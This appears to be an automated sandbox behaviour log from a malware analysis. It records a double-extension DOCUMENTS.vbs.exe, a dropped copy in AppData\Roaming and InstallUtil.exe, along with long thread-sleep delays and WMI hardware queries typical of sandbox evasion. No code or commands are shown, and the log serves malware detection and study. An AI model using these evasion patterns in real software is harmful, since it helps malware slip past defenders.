Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797093

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Window / User API: threadDelayed 4153	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Window / User API: threadDelayed 4311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2737	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7103	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Window / User API: threadDelayed 6432
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Window / User API: threadDelayed 2965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1738
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Window / User API: threadDelayed 4661
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Window / User API: threadDelayed 1856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6564

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe TID: 7940	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7452	Thread sleep count: 2737 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7452	Thread sleep count: 7103 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -99671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -99329s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98428s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98311s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98201s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -98087s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -97926s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -97643s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -97386s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -97063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -96953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1800000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799889s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1799015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1798906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1798797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1798687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1798578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1798469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1798359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1798172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1798031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1797884s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1797769s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1797646s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1797531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1797422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1797312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7336	Thread sleep time: -1797203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe TID: 7524	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7724	Thread sleep count: 3837 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -99874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7724	Thread sleep count: 1738 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -99760s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -99640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -99530s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -99418s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -99311s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -99202s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -99088s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -98983s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -98839s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -98219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -98078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97516s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97188s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -97078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -96968s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -96859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1799929s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1799812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1799685s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1799562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1799452s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1799343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1799232s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1799115s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1798998s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1798775s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7732	Thread sleep time: -1798546s >= -30000s
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe TID: 3272	Thread sleep count: 4661 > 30
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe TID: 3712	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe TID: 3984	Thread sleep count: 1856 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep count: 39 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5448	Thread sleep count: 3283 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -99874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -99763s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -99640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -99523s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -99419s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5448	Thread sleep count: 6564 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -99302s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -99172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -99062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98840s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98732s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98516s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98391s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98279s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -98062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -97952s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -97844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -97734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -97625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -97516s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -97406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799796s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799574s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799467s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1799024s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1798894s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1798765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1798656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1798531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1798399s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1798296s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1798182s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1798077s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797968s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797745s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797528s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797421s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656	Thread sleep time: -1797093s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98428	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98087	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97386	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799562	Jump to behavior
